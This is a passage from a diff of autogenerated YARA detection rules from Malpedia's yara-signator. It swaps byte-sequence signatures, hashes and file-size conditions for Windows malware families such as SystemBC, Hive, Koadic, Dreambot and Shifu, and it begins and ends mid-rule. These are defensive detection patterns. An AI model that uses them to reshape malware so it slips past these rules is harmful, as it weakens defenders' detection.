"fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20230705" + malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" + malpedia_version = "20230715" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? ffd6 68???????? 6a01 6a00 ff15???????? 68e8030000 } - $sequence_1 = { 8b7c2410 8d442438 50 53 ff15???????? 85c0 0f8529ffffff } - $sequence_2 = { 8d95f8f3ffff 8bce 2bd6 0f1f00 8a01 8d4901 } - $sequence_3 = { ff15???????? ff35???????? ff15???????? 68???????? 68???????? 8d8424a8010000 68???????? } - $sequence_4 = { 8bf9 897da0 8b7308 8d4dbc 897d9c 6a24 68???????? } - $sequence_5 = { 83e103 f3a4 8d442428 50 53 ff15???????? 85c0 } - $sequence_6 = { 51 e8???????? 83c408 837dbc10 8d45a8 0f4345a8 50 } - $sequence_7 = { 88811744c213 84c0 75ed 0fb605???????? f30f7e05???????? a2???????? a1???????? } - $sequence_8 = { c705????????80381713 c705????????003a1713 c705????????c03f1713 c705????????80401713 c705????????c0491713 c705????????704b1713 c705????????30451713 } - $sequence_9 = { 83c40c 8d842498040000 6a64 50 6a07 6800040000 ff15???????? } + $sequence_0 = { eb02 33f6 803d????????00 751f 803d????????00 7516 80fb01 } + $sequence_1 = { 52 50 51 e8???????? 8b542430 83c40c 68e0930400 } + $sequence_2 = { 52 66c7060802 66c746041066 c6460820 } + $sequence_3 = { 56 ff15???????? 85c0 750b 8906 32c0 5e } + $sequence_4 = { 83c001 84c9 75f7 2bc7 83e801 39442404 720a } + $sequence_5 = { ffd6 85ff 740f 85db 740b 837c242000 7404 } + $sequence_6 = { 8b2d???????? 3beb 742e 8b4524 3bc3 7407 50 } + $sequence_7 = { 7416 e8???????? 6a00 e8???????? 83c404 } + $sequence_8 = { e8???????? 8b442418 83c40c 8b4f0c } + $sequence_9 = { 742f 33c0 3906 763d 8d4c2448 } condition: - 7 of them and filesize <23088128 + 7 of them and filesize <107520 } -rule MALPEDIA_Win_Systembc_Auto : FILE +rule MALPEDIA_Win_Sierras_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "33299700-4e02-5584-bb63-8a8197d8417b" + id = "605d6eab-f109-574e-b05c-a9ae83591a9c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.systembc_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sierras_auto.yar#L1-L167" license_url = "N/A" - logic_hash = "29f113c1b3510221b57bbc147c9c5017608a490a95fbc04ce80eea2621980153" + logic_hash = "a564c7fabb45cfabecce73bb6168ff37faec379b0995b89fe8defbd9d38cf80c" score = 75 quality = 75 tags = "FILE" @@ -144872,34 +147688,40 @@ rule MALPEDIA_Win_Systembc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b8e88010000 8b968c010000 8bb690010000 8945e4 895df4 } - $sequence_1 = { 52 6a00 6a00 6a00 ffb568f9ffff } - $sequence_2 = { 668b9554f9ffff 6a00 6a00 6a03 6a00 6a00 } - $sequence_3 = { 898568f9ffff c7856cf9ffff00040000 8d853cf9ffff 50 6a00 6a00 } - $sequence_4 = { 81c200008000 81c200100000 81c200200000 6a00 52 } - $sequence_5 = { 8d851cf4ffff 50 6800010000 57 ffb530f4ffff } - $sequence_6 = { 50 e8???????? ffd0 8b85f4feffff } - $sequence_7 = { 43 3b5dfc 7296 33c0 5e 5f } - $sequence_8 = { 668b9554f9ffff 6a00 6a00 6a03 6a00 } - $sequence_9 = { 57 56 8b7d10 33c0 } + $sequence_0 = { f3a4 8d8c2424050000 8d942430080000 51 } + $sequence_1 = { 56 8bf1 57 68???????? 8d4604 50 } + $sequence_2 = { 50 8d45e0 50 e8???????? eb0f 8b4dec } + $sequence_3 = { e8???????? 50 8d442430 50 8d8c24ec000000 } + $sequence_4 = { 0f8480030000 8b4dfc ff4df8 0fb611 8bcf } + $sequence_5 = { 7507 e8???????? eb05 e8???????? 0175f0 } + $sequence_6 = { 8bf1 e8???????? 8b8698010000 5e } + $sequence_7 = { 8bc8 83e103 f3a4 8bbc2410040000 } + $sequence_8 = { 03fb 3b7d10 72b0 8b5df0 834dfcff 8d4de0 } + $sequence_9 = { 8bf1 33db 6a01 6a78 } + $sequence_10 = { f2ae f7d1 2bf9 8d942480000000 8bf7 8bd9 8bfa } + $sequence_11 = { 8bf1 e8???????? 8b8608010000 5e c3 56 } + $sequence_12 = { 397d08 897dfc 0f8cc0000000 837d0801 7e58 } + $sequence_13 = { c7401880dd4000 e9???????? 83e00f c70613000000 894648 8b4648 85c0 } + $sequence_14 = { 58 0fb688c88c4000 6683bc8e7e0a000000 7506 } + $sequence_15 = { 3bf8 7cce 8b442418 83c520 40 83f803 89442418 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Owlproxy_Auto : FILE +rule MALPEDIA_Win_Moker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9642ab2d-7dc5-58a6-b1f9-20da6d2b2d38" + id = "18389526-a462-5233-a3a7-297ee29d064f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.owlproxy_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moker_auto.yar#L1-L160" license_url = "N/A" - logic_hash = "8f3ab8fd440290f6fe4f2136a06c496cf082fcb282138fdbc332de45a924ef6b" + logic_hash = "12a75630b6f84d2ec097d0e96068cb391171b00fda112afc8eea40b8efef358b" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -144911,32 +147733,38 @@ rule MALPEDIA_Win_Owlproxy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d942450010000 488d8c2430010000 e8???????? 90 4c8d842430010000 4883bc244801000008 4c0f43842430010000 } - $sequence_1 = { 488bcb 488905???????? ff15???????? 488d151b580100 483305???????? 488bcb 488905???????? } - $sequence_2 = { 4889442428 488d442450 4533c0 488bcf 664489a588010000 4889442420 ff15???????? } - $sequence_3 = { 488d4c2440 e8???????? eb27 49c747180f000000 49c7471000000000 41c60700 4533c0 } - $sequence_4 = { e8???????? 448bc0 488bd3 488bce e8???????? 84c0 7406 } - $sequence_5 = { e8???????? 90 488b4527 4c8b4d0f 6690 48837de700 740a } - $sequence_6 = { 4c8bc6 498bd7 488d0c28 e8???????? 4c8b4708 488b542478 } - $sequence_7 = { f6c101 7527 458bc6 488d156ee10000 663b1a } - $sequence_8 = { 4889442428 488d054eff0100 4889442440 488b442468 48634804 488d0581fe0100 4889440c68 } - $sequence_9 = { 89442420 4c8bce 4533c0 488b5610 488b4da8 ff15???????? 85c0 } + $sequence_0 = { 0302 8945d4 8b4dd4 83c102 } + $sequence_1 = { 0302 8945e8 eb09 8b45e8 } + $sequence_2 = { 0302 8945e8 8b4df8 8b55fc } + $sequence_3 = { 0302 50 e8???????? 83c404 3b450c 750b 8b4df0 } + $sequence_4 = { 0301 8945e0 e8???????? 8b55e8 } + $sequence_5 = { 0302 8945dc 8b45dc 83c002 } + $sequence_6 = { 6a00 6a04 6a01 68000000c0 } + $sequence_7 = { 0100 83c414 85c0 7502 eb0a } + $sequence_8 = { 89e5 ff7508 ed 2e5c 034508 } + $sequence_9 = { 48 8b7c2428 48 39f7 7413 fc } + $sequence_10 = { 49 8b4c2408 ffd0 48 } + $sequence_11 = { d16000 d0806200a501 40 00b070e000e0 31e0 00d5 31c0 } + $sequence_12 = { 880424 49 89442430 49 89742458 66813e4d5a } + $sequence_13 = { 50 51 52 48 } + $sequence_14 = { c20800 55 89e5 ff750c ed } + $sequence_15 = { 89e5 60 8b7d08 6887000000 ed } condition: - 7 of them and filesize <475136 + 7 of them and filesize <1761280 } -rule MALPEDIA_Win_Defray_Auto : FILE +rule MALPEDIA_Win_Unidentified_107_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ee2cc914-ed1c-504f-bf38-50caf0bf4350" + id = "3e7e44ff-0f02-5267-8346-e5f949ff1ff2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.defray_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_107" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_107_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "6779b35681313abc4956d5610d5c5eb736ab6b4450531cda5b5e81d10fef89b6" + logic_hash = "36a3784a29d5434d0fa9e9c5acdfc21d8509c8e92eeaa689801f442b7fb11fdb" score = 75 quality = 75 tags = "FILE" @@ -144950,32 +147778,32 @@ rule MALPEDIA_Win_Defray_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3bc1 75c3 894db4 8d8d60ffffff e8???????? 84c0 7419 } - $sequence_1 = { 8b0b 8bc1 83e13f c1f806 6bc930 8b048568f34800 } - $sequence_2 = { 33c0 8dbd94f5ffff a5 a5 a5 8dbda0f5ffff be???????? } - $sequence_3 = { 2bf2 8d7b1f c1ef05 c1fe02 897d08 3bfe 7322 } - $sequence_4 = { 83c9f8 41 0f2825???????? 8bd6 0f282d???????? 2bd1 0f57db } - $sequence_5 = { 33c6 03d0 8b85e0feffff 03940514ffffff 039008d54700 03d7 8bbde4feffff } - $sequence_6 = { 56 6a02 51 8975fc 8975f8 ff15???????? } - $sequence_7 = { 663907 7407 83c702 3bfe 75f4 3bfe 0f8434feffff } - $sequence_8 = { 8bf0 85f6 0f8528050000 8b45d8 c745f4006d4100 8945f8 837d1000 } - $sequence_9 = { 6a0c 99 5f f7ff 8365e000 8b7508 85c0 } + $sequence_0 = { 4139d9 75d8 4c89e1 e8???????? } + $sequence_1 = { 48897008 4c89e1 ff15???????? 488b05???????? 4c89e1 48891d???????? } + $sequence_2 = { 0f83d6fdffff 4c8b35???????? 8b7304 448b2b 4883c308 4c01f6 44032e } + $sequence_3 = { 034208 4839c1 7214 4883c228 } + $sequence_4 = { 0f8584000000 4c8b3e 4929c7 4901cf } + $sequence_5 = { e8???????? 4c89e1 ff15???????? 31c0 4883c428 } + $sequence_6 = { 8b15???????? 85d2 0f8ea1feffff 488b35???????? 31db 4c8d65fc } + $sequence_7 = { e8???????? 4989c7 48b9ca0e99c700000000 e8???????? 4883c464 488b4c2408 } + $sequence_8 = { 4183fc01 0f85a9feffff 8b05???????? 85c0 0f8e9bfeffff 83e801 488b1d???????? } + $sequence_9 = { 4c89442418 4c894c2420 4883ec64 48c7c10f15af3d } condition: - 7 of them and filesize <1253376 + 7 of them and filesize <254976 } -rule MALPEDIA_Win_Shifu_Auto : FILE +rule MALPEDIA_Win_Rifdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b2b85e64-d954-5aeb-b02a-9d97cb3ba3ee" + id = "10650b5d-c263-58c2-9892-48c8752426d4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shifu_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rifdoor_auto.yar#L1-L174" license_url = "N/A" - logic_hash = "fa5868e6742fc467c77c9f2e2fa5062fd3f24b48dd60ea0ece307848b06e5759" + logic_hash = "041eb6ebe0e6f7a680f9d10fa1b95fdf41bb567152330eaf4a0d973e56aa2474" score = 75 quality = 75 tags = "FILE" @@ -144989,34 +147817,40 @@ rule MALPEDIA_Win_Shifu_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 740d 57 6a1b ba???????? } - $sequence_1 = { 6a24 ff7508 ffd6 53 8d45f0 50 } - $sequence_2 = { 83651800 8d941a00010000 895508 8b5510 0fbe1410 89550c 85c9 } - $sequence_3 = { 740c e8???????? 8325????????00 8d85fcfeffff e8???????? } - $sequence_4 = { 50 ff75f4 ff15???????? 85c0 7511 ff75f0 8d443701 } - $sequence_5 = { 668985a2fcffff b8170b0000 66898578fcffff 6a14 58 6689857afcffff 8b4348 } - $sequence_6 = { 83c102 836d0c02 eb2d 8bd9 8b4f2c 2bd8 035de8 } - $sequence_7 = { 8975e4 6a0c 58 e8???????? 8965e8 8bfc 3bfe } - $sequence_8 = { 33c0 5e c9 c20c00 55 8bec 85c9 } - $sequence_9 = { 56 8d85e8feffff 53 50 ff15???????? 8d85e8feffff 83c410 } + $sequence_0 = { e8???????? 8be5 5d c20400 6804010000 8d54240c } + $sequence_1 = { 0f8484000000 391d???????? 747c 391d???????? 7474 391d???????? 746c } + $sequence_2 = { ba4f000000 8bc2 668944243c b952000000 66894c2438 668954243a } + $sequence_3 = { 83c408 85c0 7405 bf01000000 8d542410 52 ff15???????? } + $sequence_4 = { 830eff 2b34bd605d4100 c1fe06 8bc7 c1e005 } + $sequence_5 = { b001 5e 81c408010000 c3 5f 32c0 } + $sequence_6 = { 8d4c2454 51 8b4c2410 8d54242c e8???????? 83c408 85c0 } + $sequence_7 = { 83c408 a3???????? e9???????? 3c01 } + $sequence_8 = { 53 56 8b35???????? 57 3b35???????? 7d4a } + $sequence_9 = { 50 8b410c ffd0 8b95f0f7ffff } + $sequence_10 = { e8???????? 8b1d???????? 33c0 83c40c 33d2 } + $sequence_11 = { 68ff000000 8d9524faffff 52 ff15???????? } + $sequence_12 = { 75f9 8d8de8fbffff 2bc2 51 40 } + $sequence_13 = { c1ee08 0bd6 884101 03c2 8d1400 33d0 } + $sequence_14 = { ff15???????? 68???????? 6a00 6801001f00 ff15???????? 5f 5e } + $sequence_15 = { 8d8424a8010000 50 53 ff15???????? 85c0 7507 53 } condition: - 7 of them and filesize <344064 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Sword_Auto : FILE +rule MALPEDIA_Win_Hive_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "48310a96-8b09-5184-8f0c-c81d31bbe550" + id = "d6a0e69c-8ba3-5e7b-a7ea-75f1727a32de" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sword_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hive_auto.yar#L1-L183" license_url = "N/A" - logic_hash = "f0b3a1cc57dfaff82b285dd4a0f174f5006c9f22ab9c244578d6f7f68d086b5a" + logic_hash = "6114f2e9f03828db87c71adf2ad1d3eed20f57d01fa9bb999ecd2843927df4e0" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -145028,32 +147862,43 @@ rule MALPEDIA_Win_Sword_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7d1 2bf9 8d942484020000 8bf7 8bfa } - $sequence_1 = { ff15???????? 8b8c2434000100 50 8b84243c000100 8d542424 } - $sequence_2 = { 50 8d54241c 51 52 ff15???????? 85c0 0f8488090000 } - $sequence_3 = { 49 885c29ff 807d0022 7520 8d7d01 } - $sequence_4 = { 83c9ff 33c0 8d942488030000 f2ae f7d1 49 } - $sequence_5 = { 77c8 bf???????? 83c9ff 33c0 f2ae f7d1 } - $sequence_6 = { b940000000 33c0 8d7c2419 8894241c010000 f3ab } - $sequence_7 = { 83c9ff 33c0 f2ae f7d1 2bf9 55 } - $sequence_8 = { 8dbc2494060000 83c9ff 33c0 f2ae f7d1 49 } - $sequence_9 = { f7d1 49 83f903 77c8 bf???????? } + $sequence_0 = { 31c0 b91d000000 31d2 31db } + $sequence_1 = { b807000000 b9d4000000 31d2 31db } + $sequence_2 = { 89c2 e8???????? b801000000 e8???????? } + $sequence_3 = { 31c9 31d2 bb54000000 31f6 } + $sequence_4 = { 89d1 e8???????? b802000000 e8???????? } + $sequence_5 = { 31c9 31d2 bb08000000 becb000000 31ff } + $sequence_6 = { 89d0 b90d000000 e8???????? b90d000000 } + $sequence_7 = { 31db 31ff eb31 31c0 } + $sequence_8 = { 31ff e8???????? 833d????????00 7511 } + $sequence_9 = { 89d1 e8???????? b901000000 e8???????? } + $sequence_10 = { 81c4b0000000 c3 e8???????? 90 } + $sequence_11 = { 31c9 31d2 bb09000000 bee0000000 } + $sequence_12 = { 31c0 eb17 0fb6940496000000 0fb674041c 31d6 } + $sequence_13 = { 01c1 83c101 83f90c 0f820fffffff } + $sequence_14 = { 01c1 c1e106 400fb6d6 01ca } + $sequence_15 = { 01c8 c1e006 400fb6cf 01c1 } + $sequence_16 = { 01c1 c1e106 0fb6c2 01c8 } + $sequence_17 = { 01c2 b8ffffff03 21c5 21c3 } + $sequence_18 = { 01c0 4000f8 0fb6c0 48898424b0000000 } + $sequence_19 = { 01ca c1e206 0fb6c3 01d0 } + $sequence_20 = { 01c8 89c1 c1e91f ffc9 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <7946240 } -rule MALPEDIA_Win_Unidentified_023_Auto : FILE +rule MALPEDIA_Win_Koadic_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f77c5286-0b1f-561f-8f58-a27a0408436a" + id = "e207fda4-6d66-54cd-bdbd-2bc35fe49343" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_023_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.koadic_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "1eec10f2afa6bd7e6a1d69558f2f25a771bedb385bd839fc0b4d5b578eec4086" + logic_hash = "4723d27185eb97d6e28808abd0dca69a0777b4b3cb3951837b42f0c81d537f3d" score = 75 quality = 75 tags = "FILE" @@ -145067,34 +147912,34 @@ rule MALPEDIA_Win_Unidentified_023_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 } - $sequence_1 = { 894df4 8a15???????? 8855f8 837d0c01 7514 8bf4 68???????? } - $sequence_2 = { 8855f8 837d0c01 7514 8bf4 } - $sequence_3 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 } - $sequence_4 = { 8855f8 837d0c01 7514 8bf4 68???????? } - $sequence_5 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 8bcd } - $sequence_6 = { 0909 0909 0407 0807 8d4900 4f } - $sequence_7 = { 8a15???????? 8855f8 837d0c01 7514 8bf4 } - $sequence_8 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 7514 } - $sequence_9 = { 7514 8bf4 68???????? ff15???????? 3bf4 e8???????? b801000000 } + $sequence_0 = { 0f84b4020000 53 56 57 8b7c2424 bb01000000 83ffff } + $sequence_1 = { 035c2408 53 58 e8???????? a3???????? 8b5c2414 035c2408 } + $sequence_2 = { 83fb01 0f8da9000000 8b542404 ff35???????? e8???????? 8b15???????? } + $sequence_3 = { 50 8d4c2420 51 e8???????? e9???????? 6a08 } + $sequence_4 = { 3b1c24 7527 8b15???????? ff35???????? e8???????? 8d05c8334100 50 } + $sequence_5 = { 72f1 eb07 8b34c5c4124100 8bc6 8d5001 } + $sequence_6 = { 7507 c7450c02104100 53 56 8b7508 f6462c01 57 } + $sequence_7 = { 50 68???????? ff35???????? e8???????? 21c0 7414 ff35???????? } + $sequence_8 = { e8???????? 890424 6800000000 e8???????? a3???????? ff35???????? ff742404 } + $sequence_9 = { ff15???????? 8b542434 81c200000800 89542428 eb04 8b5c2414 8b442434 } condition: - 7 of them and filesize <1433600 + 7 of them and filesize <180224 } -rule MALPEDIA_Win_Dreambot_Auto : FILE +rule MALPEDIA_Win_H1N1_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6c3809b8-d477-5125-8734-0179b265a99d" + id = "5e13a49f-72f0-5eb3-a885-2e0245e8f66e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dreambot_auto.yar#L1-L1031" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.h1n1_auto.yar#L1-L170" license_url = "N/A" - logic_hash = "d649e332b74326d8b7e280b52a73b7636b1baab8e64673c71262bd2586c99629" + logic_hash = "842ef63a8a089830b40dfc0f60da9194950df4056683b94edaa8a18caec3ebbd" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -145106,141 +147951,38 @@ rule MALPEDIA_Win_Dreambot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { a802 7410 8b4730 a840 7509 83672800 e9???????? } - $sequence_1 = { 897b20 8b4320 c6400731 8b742414 8b3e 6a00 } - $sequence_2 = { 7454 68???????? 68???????? ff7320 e8???????? } - $sequence_3 = { 0f8555ffffff 894730 e9???????? 55 8bec } - $sequence_4 = { 85f6 0f84a9000000 e8???????? 85c0 0f8483000000 } - $sequence_5 = { e8???????? 8bf8 85ff 755a 39451c 7475 } - $sequence_6 = { 751a 395d10 7413 8b4618 e8???????? eb09 ff7618 } - $sequence_7 = { 51 51 33c0 50 56 ff5214 8bfb } - $sequence_8 = { 53 68???????? eb54 3bf3 745c 395d0c 7457 } - $sequence_9 = { 837d0c04 7516 ff7510 ff36 68???????? } - $sequence_10 = { ebcc 3bf3 7474 395d0c 746f 6a0d } - $sequence_11 = { 3bf3 0f8496000000 395d0c 0f848d000000 6a07 ebdd } - $sequence_12 = { 3bf3 0f8481000000 395d0c 747c 6a03 } - $sequence_13 = { e8???????? 894508 8b7d08 eb24 a1???????? 85c0 7520 } - $sequence_14 = { 745c 395d0c 7457 53 ff750c 8bfe c7450857000000 } - $sequence_15 = { e8???????? e9???????? 3bf3 0f8496000000 } - $sequence_16 = { 4803542460 41ff5220 4c8b442460 e9???????? } - $sequence_17 = { e8???????? 4c8b1d???????? ba0d000000 41834b3401 } - $sequence_18 = { 0f84b5000000 413bf5 0f84ac000000 41b807000000 ebd7 493bfd } - $sequence_19 = { 4c896c2420 e8???????? 4c8b442468 488b0d???????? 33d2 } - $sequence_20 = { 7423 41b904000000 413bf1 7518 8b17 } - $sequence_21 = { 418d5620 498bcf ff15???????? 4c8bf0 4885c0 } - $sequence_22 = { 498bcb 492bd0 4803542460 41ff5220 } - $sequence_23 = { 0f8492000000 41b803000000 ebbd 493bfd 0f8481000000 413bf5 } - $sequence_24 = { 4c8b18 488b542460 4533c9 488bc8 41ff5318 } - $sequence_25 = { 488d5e10 4533f6 488b0b 2580000000 418d5620 } - $sequence_26 = { ff15???????? e9???????? 493bfd 0f84d9000000 } - $sequence_27 = { e8???????? eb2c 8b05???????? 413bc5 7528 } - $sequence_28 = { 488b9424a8000000 4533c9 4533c0 ff5028 } - $sequence_29 = { 0f8481000000 413bf5 747c 41b80d000000 } - $sequence_30 = { 488bcf e8???????? e9???????? 493bfd 0f84b5000000 } - $sequence_31 = { 5f c3 4053 4883ec20 4c8b4108 488bd9 4d85c0 } - $sequence_32 = { 0f849b000000 413bf5 0f8492000000 41b803000000 ebbd } - $sequence_33 = { 33d2 89442448 ff15???????? 33d2 } - $sequence_34 = { 33d2 3bc2 0f85bd000000 33c0 89942498000000 } - $sequence_35 = { e8???????? 488b5c2428 85c0 753e 8b9424c8000000 } - $sequence_36 = { 3decc7eea6 0f84e8000000 3d0470a8c4 0f8486000000 } - $sequence_37 = { 488b0d???????? 4d8bc4 33d2 ff15???????? 488bf8 } - $sequence_38 = { 4883ec30 837a3c04 4c8b2a 488bf2 488bd9 } - $sequence_39 = { 89750c 8d750c e8???????? 8bf0 } - $sequence_40 = { 4883c208 4883e901 75e2 837c243801 0f86b2000000 } - $sequence_41 = { 8b450c 33db 895dfc e8???????? 8945f8 33ff eb03 } - $sequence_42 = { 75f5 eb06 8b05???????? 35fc5585cf 4533c9 } - $sequence_43 = { ff7310 ff15???????? 33d2 89b7184a0000 39971c4a0000 } - $sequence_44 = { ff33 50 6810040000 ff15???????? 8945fc } - $sequence_45 = { 56 33f6 46 8945f8 } - $sequence_46 = { c3 6a00 6800004000 6a00 ff15???????? a3???????? 85c0 } - $sequence_47 = { 46 8945f8 85c0 7551 } - $sequence_48 = { 57 4883ec20 8b05???????? 8364243800 } - $sequence_49 = { ff15???????? 8945fc 85c0 741a 6804010000 } - $sequence_50 = { 85c0 7551 ff33 50 } - $sequence_51 = { eb03 8b750c ff75f8 69f60d661900 ff75f4 81c65ff36e3c 89750c } - $sequence_52 = { 817424105085b8ed 33ff 47 57 be???????? 56 8d542418 } - $sequence_53 = { 1bdb f7db 83c303 ebc4 } - $sequence_54 = { 8b9424c8000000 85d2 7421 4533c9 } - $sequence_55 = { 4883f8ff 488bf8 7445 488d842488000000 } - $sequence_56 = { 48c7c101000080 ff15???????? 85c0 7568 4c8d8c24d0000000 4c8d8424c8000000 488d542428 } - $sequence_57 = { 4c8bc3 33d2 ff15???????? 4821742428 4c8d8424c8000000 488d542428 488d4c2450 } - $sequence_58 = { 4883c208 4983e801 75e4 8b442420 } - $sequence_59 = { 0f84ca010000 8b424c a801 0f840f010000 8b424c } - $sequence_60 = { 33c0 89942498000000 899424a8000000 8984249c000000 } - $sequence_61 = { 498be9 e8???????? 4885c0 488bf0 0f84a3000000 } - $sequence_62 = { 8db4083089b9ed 57 8d45f4 50 } - $sequence_63 = { 4d3bef 7415 498bd5 4883c9ff } - $sequence_64 = { 8b45fc 0fb700 8bc8 81e100f00000 } - $sequence_65 = { ff75fc e8???????? 8b45f0 40 c745e801000000 } - $sequence_66 = { 4c8bc6 ff15???????? 488bd8 493bc7 } - $sequence_67 = { 395d10 0f8402010000 6a03 eb13 3bf3 } - $sequence_68 = { 6a01 eb3d 3bf3 0f8420010000 } - $sequence_69 = { 8d85a2fcffff 53 50 895de4 e8???????? } - $sequence_70 = { 4885c9 7405 e8???????? 4883c428 c3 4053 } - $sequence_71 = { 493bc5 742f 488d4810 ff15???????? } - $sequence_72 = { 57 6806020000 668985a0fcffff 8d85a2fcffff 53 } - $sequence_73 = { 8be5 5d c20400 8325????????00 6a00 } - $sequence_74 = { 740e 44893d???????? 44893d???????? 488d442440 4c8d4c2440 4c8d442440 4889442430 } - $sequence_75 = { 89410e 5f 5e 5b c9 c20400 } - $sequence_76 = { 8bf0 33db 81c1fefeffff 33c0 83cfff 33d2 895dfc } - $sequence_77 = { 59 c20400 a1???????? 53 55 56 57 } - $sequence_78 = { 7505 8d5857 eb15 488b05???????? 89702a 48897d00 eb17 } - $sequence_79 = { eb08 ff15???????? 8bd8 413bde 0f85fb010000 488b05???????? } - $sequence_80 = { 66b90100 4889442420 e8???????? 3bc3 0f859b000000 } - $sequence_81 = { a1???????? 83c036 83c9ff f00fc108 } - $sequence_82 = { 0f8e2a040000 8a05???????? 4238042b 7521 448bc2 4963ce } - $sequence_83 = { e8???????? 488b0d???????? 448be0 f0834156ff 85c0 } - $sequence_84 = { 83c036 41 f00fc108 a1???????? 83c01e 50 } - $sequence_85 = { 488bf0 eb34 488d0595d6ffff 4885c0 7428 } - $sequence_86 = { 6a0a ff15???????? a1???????? 8b4036 } - $sequence_87 = { ffb72c080000 e8???????? 5e 5d 5b c3 eb10 } - $sequence_88 = { e9???????? 83f916 0f8fa7080000 0f8415080000 } - $sequence_89 = { 83c01e 50 ff15???????? 8a06 3a4704 7311 8b0f } - $sequence_90 = { 33d2 e8???????? 44892d???????? 33c9 44892d???????? e8???????? 488bcf } - $sequence_91 = { 8d4604 66d3e0 66098310170000 8d4103 } - $sequence_92 = { 488b0d???????? 4883c12e ff15???????? 4c8b05???????? 448d7b02 } - $sequence_93 = { 8b9314170000 83432801 b910000000 8d42f3 2aca } - $sequence_94 = { a1???????? 